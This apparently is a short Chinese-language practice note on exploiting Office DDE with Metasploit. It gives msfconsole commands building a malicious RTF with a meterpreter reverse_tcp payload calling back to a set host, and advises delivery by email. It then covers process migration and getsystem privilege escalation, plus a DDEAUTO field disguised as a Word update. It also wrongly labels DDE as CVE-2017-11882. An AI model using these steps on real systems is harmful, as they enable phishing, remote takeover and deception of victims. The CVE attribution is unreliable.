OFFICE DDE,这是微软的 OFFICE中的一个功能,能过够执行公式,插入远程图片,也可以用来执行恶意代码,即有了OFFICE DDE漏洞,cve编号:CVE-2017-11882,刚开始漏洞被发现的时候,微软并没有认为是漏洞,认为这是OFFICE软件的正常功能。
正好今天学习metasploit,拿这个漏洞练练手
msfconsole
search office-dde
use exploit/windows/fileformat/office_dde_delivery
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.78.128
run
拷贝payload文件msf.rtf到目标机器,现实中发邮件的攻击最常见。
在目标机器上运行msf.rtf
获取meterpreter
getpid 查询当前进程id
migrate 3328 注入进程,注入至explorer.exe进程中
kill 如果原来的进程没有停止,执行kill命令
getsystem 提权
…
…
手工测试dde也很简单
新建word文档,ctrl+F9,插入以下的测试代码
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
或者插入-文档部件-域,选择第一个= (Formula) 然后右键切换域代码来编辑代码,插入上面的内容
稍微伪装以下:看起来像是word要更新
伪装的代码:
DDEAUTO C:\\Programs\\Office\\Updates\\WINWORD.exe/../../../../Windows\\System32\\cmd.exe "WinWord Update /k calc.exe"
更多测试代码可以参考《Office DDE漏洞学习笔记》